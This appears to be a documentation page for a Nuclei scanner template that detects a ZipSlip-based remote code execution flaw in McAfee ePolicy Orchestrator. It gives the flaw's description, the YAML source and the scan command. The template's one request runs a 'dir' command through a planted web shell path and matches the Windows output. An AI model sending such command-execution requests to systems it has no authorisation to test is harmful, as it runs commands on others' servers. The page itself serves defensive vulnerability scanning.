McAfee ePolicy Orchestrator - Arbitrary File Upload
ID: mcafee-epo-rce
Severity: high
Author: dwisiswant0
Tags: mcafee,rce
Description
Section titled “Description”McAfee ePolicy Orchestrator (ePO) is vulnerable to a ZipSlip vulnerability which allows arbitrary file upload when archives are unpacked if the names of the packed files are not properly sanitized. An attacker can create archives with files containing ”../” in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction.
YAML Source
Section titled “YAML Source”id: mcafee-epo-rce
info: name: McAfee ePolicy Orchestrator - Arbitrary File Upload author: dwisiswant0 severity: high description: | McAfee ePolicy Orchestrator (ePO) is vulnerable to a ZipSlip vulnerability which allows arbitrary file upload when archives are unpacked if the names of the packed files are not properly sanitized. An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction. reference: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ metadata: max-request: 1 tags: mcafee,rce
http: - method: GET path: - "{{BaseURL}}/stat.jsp?cmd=chcp+437+%7c+dir"
matchers-condition: and matchers: - type: status status: - 200
- type: word words: - "text/html" part: header
- type: regex regex: - "Volume (in drive [A-Z]|Serial Number) is" part: body# digest: 4b0a00483046022100c346305e9bbe146f245a1790272e8b08bcb26e2feb19d1214b1ea03e0f038901022100e69f2e0f7e66e05afd8ad29c77af11e0262863ce44fd188aff599b73edf8e844:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/mcafee-epo-rce.yaml"